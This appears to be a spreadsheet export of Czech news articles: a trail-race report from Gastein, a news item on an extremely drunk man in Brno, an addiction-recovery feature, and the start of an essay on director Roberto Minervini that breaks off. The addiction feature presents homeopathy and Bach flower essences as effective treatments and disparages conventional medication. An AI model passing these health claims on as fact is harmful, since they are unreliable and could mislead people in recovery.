Scharte, Vysoký hřeben, jejíž horizont skrývá naději. Krok, sun, krok, jako před třemi týdny na rozpálených Portáškách po testu trati Rubenczala. „Jen pojď, ty mašino,“ hecuje mě dobíhající kluk věku mého syna a strká mi do ruky mobil, abych ho cvaknul. Vejška, na instáč, jak jinak… Avšak ani na třetí konečné peklo nekončí. Naopak, láme se do travou porostlých skal. Po chvíli následují lana mezi šutry, škrábu se po čtyřech, poslední metry za hlasem z vrcholu. Mauskarkopf, Myší hlava, 2330 metrů, polarky ukazují už přes tři hodiny, 19,3 km, německé plány to měly přesně. Scheisse na druhou. Konečně začneme padat dolů. Doslova. Po čtyřech po zadku, po ostré hraně hřbetu, který se z obou stran láme do prázdnoty. Mám namotáno, z výšky i z únavy, z pusy mi visí tubus s kaší… ale nohy drží bez křečí, sice tuhé a nafouklé (lýtkové kompresní návleky zase sundám až nejdřív večer…), ale půjde to. Naskakují motory starého dieselu, které pamatují i turbo. Sbíhám uzoučkým korýtkem, traverzy mezi klečí, otevírají se pohledy na další úžasné pláně a údolíčka. Pro tohle jsem sem přece přijel. Jestliže se mi výstup zdál až nečekaně prudký, pak si představte, že se stejné metry klesají na poloviční vzdálenosti. Jestliže jsem si představoval, že poběžím v tom ideálním náklonu, kdy stačí jen svižně točit, tak to tedy ne. Musíte brzdit, každý krok, navíc s jiným došlapem. Přebíháme Maurachalm, už bych se napil, naštěstí je tu horská bystřina padající do obrlavóru u horské chaty. To je opravdu lebendiges wasser, živá voda. Seběh pokračuje příjemněji ve stínu už zase lesa, ale pak bolavěji po sjezdovce k Aeroplanstandlu a podél sáňkařské dráhy. U hotelu Goldberg na kraji Hofgasteinu se napojujeme na úvodní koridor. Stavbou u lanovky, okolo tenisových kurtů, přes most, kurparkem… Slyším cílové tlampače, ale zároveň vnímám jako by mě přikryla peřina, teď poledního žáru na šotolinové cestě. Křeče jsem do svalů (skoro) nepustil, ale teď nohy s nevídanou výškovou náloží odmítají po rovině dokončit práci. Míjejí mě nejlepší pětačtyřicátníci startující 45 minut před námi, no jo, kluci z hor… Zatáčka, první brána, druhá zatáčka, cílová rovinka, ale jo, dám to. Endorfinové slzy se derou z očí, poslední krok za čáru. Další životní (běžecký) zážitek. Infinitní! Prázdný žaludek se obrací naruby… což už přežiju, naopak oceňuju, jak jsem se vyndal. Dlouhé minuty sedím na lavici ve stínu a zalívám se vodou, pak se přesouvám k pivu do polohy vleže. Čtyři a půl hodiny jsem odjel na pět gelů, tři ampule magnézka a jednu dávku kaše, k tomu voda a ionťák. Teploměr tady dole ukazuje 32. Dojezd pokračuje celé odpoledne zaslouženě v Alpentherme. Chladnější přírodní voda, teplejší v termálním bazénu. Pořadatelé míchají proteinové afterdrinky, pivo , smaží palačinky. Nabízejí se lymfatické kalhoty, masážní pistole i kádě s ledovou vodou. Mezitím stále dobíhají další účastníci, s padající tmou i chladem nejvytrvalejší šedesátníci včetně našeho parťáka Dinua z rumunského podhůří Fagaraše . Přes třináct hodin v boji… Interesantních, nebo aspoň velmi spřízněných postav, jste tu ale potkali spoustu. Za všechny Petter Engdahl , švédský vítěz třicky, patří do top trialového běhu, můžete ho sledovat v sériích GTWS i UTMB (kde vyhrál letos kratší Eiger i Transvulcanii na Kanárech). Uvádí svoji hodnotu VO2max 92 ml/min, takže jiná kategorie… Taky třeba André Schürrle . Bývalý německý fotbalista, člen týmu mistrů světa 2014 a hráč mj. Dortmundu . V devětadvaceti (teď mu je 34) ho svět profesionální mičudy přestal bavit a zamířil do přírody. Před dvěma lety v lednu vyběhl v mrazu na Sněžku jen v trenkách… Tady dal v týmu 44 km za 8:05. „Senzační atmosféra. V cíli jsem sice myslel, že už nikdy víc, ale druhý den ráno jsem se přihlásil na příští rok na 60,“ řekl. Pravidelně se účastní týmy německé reprezentace běhu na lyžích v rámci přípravy na zimu. Letos tu byl i Luis Hernando Fernandez, čtyřnásobný španělský mistr světa v trailovém běhu a sky runningu, dříve olympijský biatlonista. Nebo Max Hitzig, čerstvý světový šampion ve freeridovém lyžování. Režie mladého závodu, který přinesl šestou edici, také nabízí zajímavé unikáty. Jako hlavní se promuje, původně jediný, týmový závod trojic na 100 km s převýšením 7700 metrů, kdy všichni startují společně, ale každý se pak vydá na svoji trasu (21, 35 nebo 44 km) a sčítají se časy. Adidas sem zve své zaměstnance z celého světa, letos startovalo 116 týmů. Naopak se nevyhlašovaly – nebo hlavně neuváděly ve výsledcích – věkové kategorie jako téměř všude, což se ale prý (snad) změní. Možná proto bylo vidět méně veteránů. Obecně: nádherné panoramatické tratě, technicky pestré, avšak zvládnutelné, ale pro našince hodně obtížné výškovými metry. Pro úplnost vítězové: 15 km: Jakob Lauerer (1:07) a Anna Hahnerová (1:19). 30 km: Petter Engdahl (2:48) a Sheila Avilésová (3:25). 45 km: Suman Kulung (4:41) a Selina Regenfelderová (5:43). 60 km: Erland Eldrup (7:55) a Isabela Avensová (10:14). Pokud jste chytli inspiraci, za rok se běží 5.-7. 9., hlaste se brzy, bývá plno. Letos měli 1600 čísel a vyprodáno, za první den se jich udalo hned 300 na rok 2025. 4denní výprava Gastein Infinite Trails čtvrtek příjezd s iniciační koupačkou po cestě (doporučuji Achensee ) „shakeout“, společné proběhnutí s místními běžci cca 10 km lehká regenerace v hotelovém bazénu pátek prezentace do závodu testování bot a oblečení adidas Terrex na Sportgastein (1690 m) odpočinek, ladění formy, příprava na závod sobota závod 15/30/45 nebo 60 km odpoledne relax v Alpentherme vedle cíle večer závěrečná párty tamtéž neděle lehký výklus dle pocitu a stavu nohou jóga protažení na vrcholu Stubnerkogelu (2023 m) a procházka po vyhlídkovém visutém mostě rozlučková Kaiserschmarrn party (s proslulým císařským trhancem se švestkami a jablečným pyré) vykoupání a vyplavání cestou domů (doporučuji Achensee ) tip na komfortní bydlení hned u startu/cíle: Hotel Österreichischer hof Gasteintal, údolí zaslíbené trailovému běhu Tak trochu ukryté údolí spolkové země Salcbursko míří k jihu ze spojky od korutansko/slovinské dálnice (za Bischofshofenem ) na Zell am See a Kaprun. Dole stoupáme z Klammsteinské soutěsky přes tři obce Dorfgastein , Bad Hofgastein a Bad Gastein od 800 metrů k tisíci (až poslední Sportgastein má 1590 m). Okolní svahy se šplhají lehce přes dva tisíce a zůstávají povětšinou zelené, což jinde takhle vysoko nenajdete, a dává jim to svébytný půvab. Postupně přejdou z vysokohorských pastvin až k trojkovým štítům nedotčeného Hohe Tauern, největšího národního parku střední Evropy. Ideální podmínky pro trailové běžce (a pochopitelně i chodce) nabízí přes 600 km značených (běhatelných) trailů. Místní okružní Gastein trail má 75 km (4643 m převýšení) a nově značený Hohe Tauern Panorama Trail dokonce 270 km, oba se dají přeběhnout nalehko na etapy s noclehy na horských boudách. Najdete tu také výjimečný lázeňský servis teplých minerálních pramenů s radonem, včetně nejstarších rakouských lázní Felsentherme v Bad Gasteinu . A zmínku zaslouží i kvalitní jídlo (i pití). „Chceme, aby se trailové běhání stalo naším poznávacím znakem,“ říká Hanna Niederführová z místní turistické centrály. Není divu, že partnerem sportovního vybavení celého regionu je adidas Terrex, brand u nás (bohužel) téměř neviditelný. Golfové hřiště s 18 jamkami si tu i oběhnete, feráty na zpestřenou dáte taky, ale bike ráj pak najdete spíš o necelou hodinku dál, nejlíp v kombinaci Saalbach/Hinterglemm/Feierbrunn/Leogang. Na podzim se tu koná ještě i festival jógy anebo jazzové jam session. Nebo zkuste ochutnat Gasteinské údolí už v zimě s lyžemi. V prosinci (13.-15.) tady startuje Ski Classics, síť propojených sjezdovek má přes 200 km, skialpové trasy a profily jsou nekonečné… Foto: adidas/Torben Wegerhoff, Stefan Schaaf, Ronny Katsch, Manuel Marktl, Jens Klatt, Matthias Wendling Autor: Tomáš Nohejl Autor person Tomáš Nohejl Rubrika transition_slide Běhy</t>
  </si>
  <si>
    <t>88</t>
  </si>
  <si>
    <t>20241101_290_3243168632_4059f244619a2c8316fa.html</t>
  </si>
  <si>
    <t>4059f244619a2c8316fa</t>
  </si>
  <si>
    <t>Opilý muž v Brně nadýchal 5,38 promile, strážníkům nejdříve nestačil ani tester</t>
  </si>
  <si>
    <t>Opilý muž v Brně nadýchal 5,38 promile, strážníkům nejdříve nestačil ani tester Dopravní kontrola - ilustrační foto. ČTK /Pancer Václav Brno - Čtyřiapadesátiletý muž v brněnských Řečkovicích nadýchal 5,38 promile, což už je dávka alkoholu , která může být smrtelná. Strážníkům při prvotním měření nestačilo ani rozpětí testeru na alkohol . V tiskové zprávě o tom dnes informoval mluvčí strážníků Jakub Ghanem. Hlídka strážníků přijela muže zkontrolovat do tramvajové smyčky v Řečkovicích ve čtvrtek v poledne po telefonátu řidičky dopravního podniku. S pomocí cestujícího prý muže odtáhla z blízkosti kolejí, u kterých ležel silně opilý. Měla obavy, aby se nevrátil zpátky k trati a neohrozil tak svůj život. "Moment překvapení pro hlídku nastal, když stále ještě polehávajícího muže pobídla k podstoupení dechové zkoušky. Přístroj totiž po prvním pokusu ukázal, že příliš vysokou hodnotu ani nedokáže změřit. Technické maximum tohoto konkrétního zařízení se přitom pohybuje kolem šesti promile," uvedl mluvčí. Strážníci proto muži zavolali záchrannou službu a s drobným časovým odstupem nechali dotyčného znovu dýchnout do alkohol testeru. Zobrazil extrémní hodnotu 5,38 promile, která pro nenavyklého člověka může být i smrtelná. Za hranici, při které hrozí upadnutí do bezvědomí a smrt, je považována hodnota čtyř promile. Někteří lidé jsou schopni snášet alkohol výrazně lépe. Příkladem je traktorista Milan Čurda , kterého před lety zadrželi policisté za volantem fekálního vozu, když nadýchal osm promile alkoholu . V roce 2018 lékaři ošetřovali houbaře z Ostravska se zlomeným kotníkem, který měl v krvi dokonce 8,83 promile alkoholu . Za světového rekordmana je považován Polák, který po oslavě s kamarády nadýchal 12,3 promile. Zdravotníci si muže v Brně převzali do své péče a po ošetření ho odvezli do nemocnice. Je podezřelý z porušení takzvaného tabákového zákona, protože se v tomto stavu zdržoval na nástupišti hromadné dopravy. Ve správním řízení mu hrozí pokuta do 20.000 korun. ČR policie alkohol Brno Autor: Václav Pancer, ČTK Autoři person Václav Pancer ČTK</t>
  </si>
  <si>
    <t>20241101_291_3243175788_7d64328fe55fa7e0ae02.html</t>
  </si>
  <si>
    <t>7d64328fe55fa7e0ae02</t>
  </si>
  <si>
    <t>Cesta ke svobodě: Odborníci sdílejí holistické přístupy při&amp;nbsp;léčbě závislostí</t>
  </si>
  <si>
    <t>Cesta ke svobodě: Odborníci sdílejí holistické přístupy při&amp;nbsp;léčbě závislostí Klíčem k holistickému přístupu k léčbě závislosti je posílení, odolnost a soběstačnost ve spojení se zdravou výživou, spánkem a přírodními prostředky. Zatímco se miliony lidí hlásí k 31denní pauze od alkoholu v akcích, jako je v Čechách známý Suchej únor anebo celosvětové akce Sober October (Střízlivý říjen) , odborníci říkají, že skutečná střízlivost zdaleka nekončí jen dočasnou abstinencí. Odborníci na závislosti, od hollywoodské smetánky až po lékaře, prosazují komplexnější přístup k zotavení, který se zabývá užíváním návykových látek i celým spektrem závislostí na chování, jež sužují moderní život. Zatímco účastníci Střízlivého října se mohou zaměřit na to, aby se po dobu jednoho měsíce vyhýbali alkoholu , odborníci na závislosti naznačují, že trvalé zotavení vyžaduje řešení hlubších problémů – ať už se jedná o závislost na lécích na předpis, hazardní hry, nutkavé nakupování nebo nadměrné sledování obrazovky. Jejich postřehy nabízejí cenné lekce pro ty, kteří bojují s vážnými závislostmi, i pro všechny, kteří se snaží o vyváženější a uvědomělejší přístup k mnoha životním pokušením. Realita a potřeba pomoci Dosažení střízlivosti zahrnuje mnohem více než jen abstinenci od návykových látek – zahrnuje vystřízlivění z iluzí a uznání, že i nadměrné množství dobrého může být škodlivé. Potřeba vnější pomoci Sean Brosnan, licencovaný poradce, dobře ví, jaké to je. Vyrůstal v Hollywoodu a zažil hlubokou ztrátu, když ve svých osmi letech přišel o matku, která podlehla rakovině vaječníků. V rozhovoru pro Epoch Times Brosnan vzpomíná na to, jak mu otcovy kontakty otevíraly dveře, avšak on sám si často zvolil nesprávnou cestu. Výsledkem bylo, že propadl alkoholu a drogám, měl problémy se zákonem a opakovaně se ocital ve vězení. Trvalo mu deset let, než dosáhl pouhých 90 dní střízlivosti. Sean Brosnan, licencovaný profesionální poradce a specialista na závislosti a zotavení. (Se souhlasem Seana Brosnana ) Jako psychoterapeut se specializací na závislosti a zotavení se Brosnan snaží pomáhat ostatním, kteří čelí podobným výzvám. Povzbuzuje lidi, aby hledali své vlastní cesty. „Každý příběh je jedinečný a věřím, že existuje mnoho způsobů, jak dosáhnout cíle,“ uvedl Brosnan. „Po studiu děl Carla Junga , Viktora Frankla a Iana McGilchrista (mimo jiné) jsem dokázal vnímat tyto mapy s mystickou perspektivou a hlubokým strukturálním významem.“ „Braní drog a pití byly moje rituály, a nyní jsem je nahradil zdravějšími.“ Individuální péče Lise Battagliaová také uznává jedinečnost příběhu každého člověka. Jako certifikovaná poradkyně pro závislosti a holistická koučka zaměřující se na zotavení z užívání léků na předpis klade zásadní důraz na význam individuální péče. Lise Battagliaová, holistická koučka pro zotavení ze závislostí, říká, že potřeba individuální péče je nepostradatelná. (Se souhlasem Lise Battaglia ové) Battagliaová a jeden z jejích pacientů, Greg, se objevili v dokumentu Introducing Homeopathy – The Film , který zachycuje Gregovu cestu k zotavení ze závislosti na benzodiazepinech, které užíval na lékařský předpis. Benzodiazepiny jsou třída léků, které zpomalují aktivitu nervového systému, navozují sedaci a zmírňují úzkost. Ačkoli sama nikdy nemusela překonávat závislost na návykových látkách, Battagliaová se ocitla na dlouhé cestě zotavení z bolesti po autonehodě. Vyrůstala v rodině, která byla proaktivní, a převzala zodpovědnost za své zdraví, ale teprve když objevila homeopatii, měla pocit, že našla opravdový poklad. „Asi jsem byla otevřená, zvědavá, tak trochu jsem chtěla účinnější péči – takže jsem náhodou objevila homeopatii a můj první lék odstranil přetrvávající bolest šest let po nehodě. Když se to stane, ptáte se: ‚Co ještě mohou udělat tyhle malé bílé pilulky?’“ Battagliaová zkompletovala své dlouholeté odborné vzdělání a znalosti alternativní i konvenční medicíny a stala se licencovanou a certifikovanou specialistkou na léčbu závislostí. Melissa Hurayová, licencovaná poradkyně pro závislosti a autorka knih Blackout to Blessing a Radical Freedom: Breaking the Chains of Addiction for Good , považuje změny životního stylu za mimořádně účinné opatření pro dosažení střízlivosti. Melissa Hurayová, licencovaná poradkyně pro závislosti a autorka. (Se souhlasem Melissy Hurayové ) Hurayová, která bojovala se závislostí na alkoholu od svých 15 do 30 let, se rozhodla vstoupit do oboru, aby pomohla ostatním. Identifikuje tři klíčové faktory ovlivňující výsledky zotavení klientů: Úroveň zapojení (touha závislého dosáhnout střízlivosti) Mimoterapeutické faktory (podpora rodiny a kroky směřující k cílům mimo léčbu) Terapeutická aliance (vztah s poradcem a vrstevníky v rámci léčebného programu) Proč lidé vyhledávají střízlivost Brosnan uznává, že i když je příběh každého člověka jedinečný, existují čtyři běžné důvody, proč lidé usilují o střízlivost: Příliš mnoho následků Přemíra emoční a fyzické bolesti Problémy ve vztazích Konkrétní cíl nebo důvod Pro něj hrály roli všechny čtyři důvody. „Bylo to narození mé dcery, které mě přivedlo na tuto cestu; byla katalyzátorem mého putování a právě skrze otcovství k dceři jsem se naučil, co to znamená být mužem. Být střízlivý mentálně, duchovně, emocionálně i fyzicky,“ napsal Brosnan v e-mailu pro Epoch Times. Typy léčby závislostí Battagliaová si uvědomuje potřebu odborné pomoci v klíčových obdobích zotavování a v rozhovoru pro Epoch Times zdůraznila rozdíly mezi konvenčním a holistickým přístupem k léčbě závislosti. Konvenční přístupy „Konvenční lékařský systém se skládá z úpravy chování a medikace, někdy elektrošokové terapie nebo transkraniální magnetické stimulace (TMS),“ napsala v e-mailu. „[Tento systém] často udržuje lidi jako pacienty tím, že nahrazuje pouliční drogy léky na předpis.“ Ačkoli tyto metody mohou přinést okamžité účinky, jen zřídka osvobodí lidi z cyklu závislosti, protože nadále spoléhají na látky. Konečným cílem je osvobodit člověka od závislostního chování. Battagliaová uvedla, že má velkou úctu k Anonymním alkoholikům za to, že prostřednictvím svých setkání podporují povědomí a zodpovědnost, což jsou neocenitelné nástroje pro pochopení emocionálních spouštěčů, které vedou k užívání návykových látek. V podpůrném a samostatně vedeném prostředí mohou účastníci rozvíjet větší sebeuvědomění. Poznámka: Osoby závislé na návykových látkách, zejména na opioidech, benzodiazepinech nebo alkoholu , mohou potřebovat lůžkovou kliniku pro bezpečné odvykání kvůli riziku závažných komplikací, včetně úmrtí . Holistický přístup Holistický přístup zohledňuje celého jedince a zahrnuje široký pohled na problém. „Stále se zabýváme neurotransmitery, které řídí chování, traumatem, pocity a emocemi, které nemají řešení, a adaptovaným chováním, které závisí na vnějším zdroji úlevy,“ řekla Battagliaová. „Tyto stavy dobře reagují na péči, která řeší počáteční trauma, nachází zdravější způsoby sebeuklidnění a využívá přírodní látky v homeopatické formě k řešení nerovnováhy na hluboké, energetické úrovni.“ Ženy a muži mají odlišnou aktivitu neurotransmiterů, poznamenala. Muži se často cítí lépe, když je v jejich fyziologii aktivní testosteron, převládající hormon, zatímco ženám prospívá estrogen a oxytocin. „Různí lidé potřebují různé přístupy,“ uvedla Battagliaová. „Ženy mohou těžit z produkce serotoninu vyvolané rozhovorovou terapií, zatímco muži se po přílišné rozhovorové terapii nemusí cítit lépe, protože produkce serotoninu může tlumit produkci dopaminu, který je prekurzorem testosteronu.“ Oprava mikrobiomu: Klíčový předpoklad Podle Battagliaové je udržování správné rovnováhy neurotransmiterů zásadní pro zotavení, což činí výživu a zdraví mikrobiomu klíčovými pro podporu vnitřního prostředí pro hojení. Vyhněte se potravinám otráveným glyfosátem Glyfosát, nejpoužívanější herbicid, který se nachází přibližně v 60 % celosvětových neselektivních herbicidů, je neurotoxin, který poškozuje lidský nervový systém. Systematický přehled zveřejněný v časopise International Journal of Molecular Science uvádí, že glyfosát má „škodlivé účinky na lidský nervový systém“. Glyfosát může procházet hematoencefalickou bariérou a způsobovat krátkodobé i dlouhodobé zdravotní komplikace, napsali vědci. Vzhledem k tomu, že zdravý nervový systém je pro zotavení ze závislosti životně důležitý, je detoxikace od potravin s glyfosátem zásadní. Jezte zdravé potraviny a udržujte hydrataci Vitamíny a minerály hrají zásadní roli v neurologickém zdraví, zejména osm vitamínů skupiny B, především B1 (thiamin), B6 (pyridoxin) a B12 (kobalamin), dále vitamín D, který významně ovlivňuje hladiny dopaminu, a vitamín C, který má vliv na náladu a metabolismus glukózy. Hořčík je dalším klíčovým minerálem, který reguluje funkci svalů a nervů, chrání před neurotoxicitou, podporuje enzymatické reakce a je nezbytný pro produkci energie. Během odvykání od návykových látek a po celou dobu zotavení je správná výživa těla zásadní pro aktivaci jeho samoléčebných mechanismů, opravu mitochondrií a doplnění vyčerpaných zásob živin. Čistá, vyvážená strava a dostatečná hydratace jsou pro úspěch klíčové. Přírodní prostředky Během procesu zotavování ze závislosti mohou být prospěšné přírodní prostředky. Battagliaová upozorňuje na několik možností fytofarmak. Bachovy květové esence „Ty jsou pro mě emocionální podporou číslo jedna,“ říká Battagliaová. „Vyhovují všem požadavkům – nevytvářejí návyk, nekombinují se s jinými léky nebo potravinami a nepotlačují příznaky.“ Tyto esence působí na hluboké energetické úrovni, odstraňují blokády, pomáhají jednotlivcům znovu se spojit se sebou a sladit se s jejich vnitřním vedením. Mezi některé konkrétní esence patří např: Krizová esence Rescue Remedy : Vynikající při okamžitých potížích Jilm : Na pocity přetížení Řepík lékařský : Na únikové tendence Třešňová švestka : Pro pocity ztráty kontroly Jabloň lesní : Pro pocity znechucení z vlastního chování Esenciální oleje Podle Battagliové je esenciální olej z černého pepře prospěšný při snižování chuti na tabák. Ve studii publikované v časopise Drug and Alcohol Dependence testované osoby šlukovaly páru z esenciálního oleje z černého pepře dodávanou přístrojem. Studie zjistila, že pepř zmírnil „negativní afekty a somatické příznaky úzkosti“ ve srovnání s neochuceným placebem. Homeopatie Homeopatie je alternativní medicína, která využívá bezpečné, netoxické mikrodávky k nastartování tělu vlastního léčebného mechanismu. Některé z těchto přírodních látek mohou být v nerafinovaných dávkách škodlivé, ředěním a protřepáváním se však stávají bezpečnými, čímž se uvolňuje jejich léčivý potenciál a odstraňuje se toxicita. Nux vomica : Tento homeopatický lék, získaný ze stromu strychninu, je užitečný při odvykání léků a toxicitě. Často je indikován těm, kteří jsou dominantní a panovační a touží po stimulantech. Arsenicum album : Tento homeopatický lék, odvozený od arsenu, se doporučuje lidem, kteří pociťují úzkost, zažívací potíže a nadměrné zdravotní potíže, zejména zhoršení příznaků po půlnoci. „Tyto léky mohou být dobrým výchozím bodem,“ uvedla Battagliová. „Je však důležité si pamatovat, že v homeopatii je léčba vždy individuální. Konzultace s homeopatem může trvat 90 minut, aby bylo možné vybrat nejvhodnější lék pro jedinečnou situaci daného jedince.“ Lidé by se měli vždy poradit s licencovaným lékařem, naturopatickým lékařem nebo profesionálním homeopatem pro vedení. Najděte si svůj rytmus Ranní ptáčata a noční sovy jsou jedním z příkladů, jak lze lidi rozdělit do skupin a pochopit, jak nejlépe fungují. Poznání sebe sama a nalezení vlastního rytmu vám pomůže přestat neustále bojovat sami se sebou. Podle Battagliové je to pro uzdravení zásadní. Spánek Battagliová zdůraznila důležitost spánku při zotavování. Zavedení pravidelného režimu spánku a bdění spolu s konzistentními stravovacími návyky může pomoci snížit hladiny kortizolu. Reakce bojuj, nebo uteč vyvolává pocity úzkosti a paniky, které mohou zesílit chuť na návykové látky, poznamenala. „Dodržování režimu je pravděpodobně to nejdůležitější, co můžete udělat, abyste porazili chuť, která vede k návykovému chování,“ uvedla Battagliová. „Nastavte své cirkadiánní rytmy tím, že si ráno zajistíte dostatek slunečního světla. Je to stará rada, kterou najdete kdekoli na internetu, ale význam udržování rytmu nelze podceňovat.“ Intervence v oblasti životního stylu Hurayová je zastánkyní intervencí v oblasti životního stylu jako vysoce účinných metod k dosažení střízlivosti. Studie podle Hurayové prokázaly, že účinnost cvičení je při léčbě úzkosti srovnatelná se Zoloftem. Rovněž bylo zjištěno, že relaxační techniky a hluboké dýchání jsou stejně účinné jako benzodiazepiny, pokud jde o zklidnění osob a snížení srdeční frekvence, poznamenala. „Chce to cvik a úsilí, stejně jako vzdělání a informovanost.“ Studie z roku 2023 publikovaná v časopise Journal of Affective Disorders zkoumala 141 účastníků s depresí nebo úzkostí po dobu 16 týdnů. Pacienti byli náhodně rozděleni a mohli si vybrat preferovanou léčbu. Vědci poté analyzovali míru remise a odpovědi na léčbu, přičemž srovnávali běh jako formu cvičení s užíváním antidepresiv. Výsledky ukázaly, že terapie běháním měla podobné výsledky jako terapie antidepresivy a že předčila léky – v tomto případě escitalopram, selektivní inhibitor zpětného vychytávání serotoninu – v proměnných fyzického zdraví, jako jsou metabolické a imunitní ukazatele, kontrola hmotnosti, srdeční frekvence, funkce plic a celková kondice. Duchovní složka Brosnan cituje Viktora Frankla , rakouského psychologa a neurologa, který navrhl tři cesty k nalezení smyslu života: Prostřednictvím práce – zejména pokud je tato práce tvůrčí povahy a je v souladu s účelem, který nás přesahuje. Skrze lásku , která se často projevuje službou druhým. Skrze utrpení , které je pro lidskou zkušenost zásadní. „Zjistil jsem, že se shodují s Ježíšovým učením, a pak jsem se přistihl, že dělám něco, co jsem si nikdy nepředstavoval: začal jsem chodit do kostela, číst Bibli a modlit se. Díky vztahu s Bohem, rodinou a dalšími lidmi trpícími stejnou nemocí jsem dokázal najít smysl života a spojení,“ řekl Brosnan. „Svůj systém víry samozřejmě nikomu nevnucuji a ani ho nevyzdvihuji. Povzbuzuji však ostatní, aby si raději našli mapu, která jim vyhovuje, než aby se snažili vymyslet si svou vlastní,“ dodal. „Nakonec jsem se smířil s tím, že možná existuje snazší a měkčí cesta [než jsem se snažil já].“ Chce tím říct, že jeho „nejlepší myšlení ho dostalo do velkých problémů“, takže místo vymýšlení vlastních řešení se podívejte, co fungovalo u ostatních, a vyberte si to, co nejlépe vyhovuje vašim potřebám. Podobně jako Brosnan zdůrazňuje i Hurayová jeden další aspekt nezbytný pro trvalý úspěch – duchovnost. „Někdo bude namítat, že ke střízlivosti nepotřebujeme Boha, a možná je to pravda, ale mně odevzdání se Ježíši přineslo skutečnou svobodu a obnovu,“ říká Hurayová. „Svět a jeho produkty mi přinesly jen dočasné vyrovnání se se situací.“ „Pokud si nerozvineme identitu v našem Stvořiteli a nepochopíme, jak a proč nás stvořil, svět nás bude rychle pokoušet falešnými bohy.“ Nakonec dodala, že každý z nás potřebuje najít onu „díru ve tvaru Boha“, do které se vejde, pokud se stane tím, kým nás Bůh stvořil. – ete – Autor: Kateřina K. Rubrika transition_slide ČR</t>
  </si>
  <si>
    <t>6640</t>
  </si>
  <si>
    <t>5530</t>
  </si>
  <si>
    <t>20241101_292_3265237393_5925adb84794cce13f8b.html</t>
  </si>
  <si>
    <t>5925adb84794cce13f8b</t>
  </si>
  <si>
    <t>Outsideři očima outsidera. Filmy Roberta Minerviniho</t>
  </si>
  <si>
    <t>Shrnutí Outsideři očima outsidera. Filmy Roberta Minerviniho 1. 11. 2024 / AUTOR: Martin Šrajer Jeden z nejvytrvalejších filmových kronikářů života na jihu Spojených států amerických pochází z Itálie . Možná i proto dokáže Roberto Minervini k americké kultuře a společnosti přistupovat bez předsudků a již dvě dekády vnímavě portrétuje ty, kdo si připadají nevyslyšeni. Minerviniho nejnovější film Prokletí (2024) z jeho dosavadní filmografie na první pohled radikálně vybočuje. Neodehrává se v současnosti, ale během americké občanské války, na nezmapovaném území daleko od frontových linií, kam byla odvelena skupina unionistických vojáků. Přestože jde ale navenek o čistě hraný film, natáčení probíhalo chronologicky a bez scénáře. Oporou byly částečně příběhy, s nimiž přicházeli neherci z Montany , kde si štáb postavil tábořiště. Do velké míry tak jde o improvizaci lidí hrajících sebe samé, při které se vzdálené dějiny Ameriky potkávají s problémy, jimiž žijí její současní obyvatelé. Minervini v dobových kulisách pokračuje v tom, co bylo vždy jeho cílem: ve snaze přiblížit se pravdě opomíjených míst a komunit zapojuje natáčené osoby do procesu výroby a stírá hranice mezi dokumentem a fikcí. Navzdory tomu, že se Prokletí odehrávají během války, jsou nezvykle klidným, poetickým snímkem, který i tématem a asketickým stylem přirozeně doplňuje autorovy obrazy života na americkém jihu ve filmech Zastavit bušící srdce (2013) nebo Druhá strana (2015). V centru pozornosti jsou opět příbuzenské vztahy mezi lidmi snažícími se přežít v politicky rozpolcené zemi, otázka víry, rasy nebo třídních rozdílů. Nový neorealismus Čtyřiapadesátiletý italský filmař je pokračovatelem hned několika kinematografických tradic. Z nezaujaté perspektivy cizinců se na sociopolitické neduhy a paradoxy Spojených států dívali a dívají i jeho krajané jako Michelangelo Antonioni , Bernardo Bertolucci , Paolo Sorrentino nebo Gianfranco Rosi . Rosi pak podobně jako Minervini reprezentuje jeden z trendů současné dokumentaristiky: překrývání a vzájemné vypůjčování technik uplatňovaných ve fikční a nonfikční tvorbě. Filmy obou tvůrců jsou příliš dokumentární, aby mohlo jít výlučně o fikci, a zároveň je v nich příliš mnoho inscenovaných momentů, abychom je označili za čistou observaci. Určující je nakonec ochota diváků věřit tomu, co vidí. „Utlumený styl dává vyniknout sociálním tématům a nehercům v hlavních rolích.“ Roberto Minervini, podobně jako jiní tvůrci pocházející z Apeninského poloostrova, bohatě čerpá také z neorealistické tradice italského filmu. Nenápadná estetika jeho děl se drží principů neorealismu, jak je shrnul duchovní otec tohoto uměleckého směru Cesare Zavattini . Minervini preferuje formální minimalismus očištěný od ornamentů. Utlumený styl dává vyniknout sociálním tématům a nehercům v hlavních rolích. Pro neorealisty i Minerviniho je charakteristická empatie a absence soudů nad postavami a jejich politickou příslušností. Ať jsou krajně konzervativní, liberální, nebo levicové, všechny hlasy mají stejnou váhu. Status člověka zvenčí tak pro Minerviniho není překážkou. Naopak mu dovoluje snáz splynout s lidmi, kteří okem majority překračují určité normy (drogová závislost, politický a náboženský extremismus) a ve své vlasti si připadají nežádoucí. V texaské trilogii, tvořené filmy The Passage (2011), Odliv (2012) a Zastavit bušící srdce, například zachytil klíčové roky Obamovy administrativy z pohledu nižších, čím dál nespokojenějších vrstev amerického obyvatelstva. Jejich pocit, že pro liberální vládu nejsou důležití, vedl později ke zvolení Donalda Trumpa , naoko reprezentujícího hodnoty těch, kdo byli opomíjeni. Dlouhá cesta k filmu Minervini sám zažil, co znamená být outsiderem ve své domovině. Narodil se roku 1970 ve městě Fermo v chudším zemědělském regionu Marche ve střední Itálii . Podobně jako jiní obyvatelé z této části země vyrůstal s pocitem méněcennosti oproti bohatému severu. Realita jeho dětství a mládí byla do značné míry realitou provincie, tvořenou semknutými komunitami, jejichž dialekt, zvyky a tradiční způsoby obživy se z pozice moderních velkoměst jeví anachronické, zaostalé. Minervini, pocházející z rodiny divadelních herců, navíc chtěl být filmovým kritikem, což mezi jeho vrstevníky nebyl zrovna typický koníček. Aby se své zálibě mohl věnovat na profesionální úrovni, začal studovat filozofii. Nejisté finanční zázemí jej ale přimělo změnit obor. Nakonec místo filozofie vystudoval ekonomiku a obchod a jako zástupce italské obchodní komory odcestoval pracovat do Madridu . Ve španělské metropoli potkal svou budoucí ženu, Američanku Denise Ping Lee, a odletěl s ní do Spojených států , kde se v roce 2000 rozhodl usadit natrvalo. Získal místo v newyorské pobočce finanční poradenské firmy, ale stále doufal, že bude moct realizovat svůj sen o práci filmového kritika. Ke změně profese byl nakonec donucen tragickými okolnostmi. Po teroristických útocích z 11. září 2001 přišel Minervini o práci a přehodnotil své priority. Měl potřebu vyjádřit sám sebe, své city, názory, dilemata. Působení ve finančním sektoru, kde sloužil nadnárodním korporacím, mu něco takového neumožňovalo. Přihlásil se proto na mediální studia na New School University , kde navštěvoval mimo jiné kurzy vedené ikonickou figurou americké dokumentaristiky 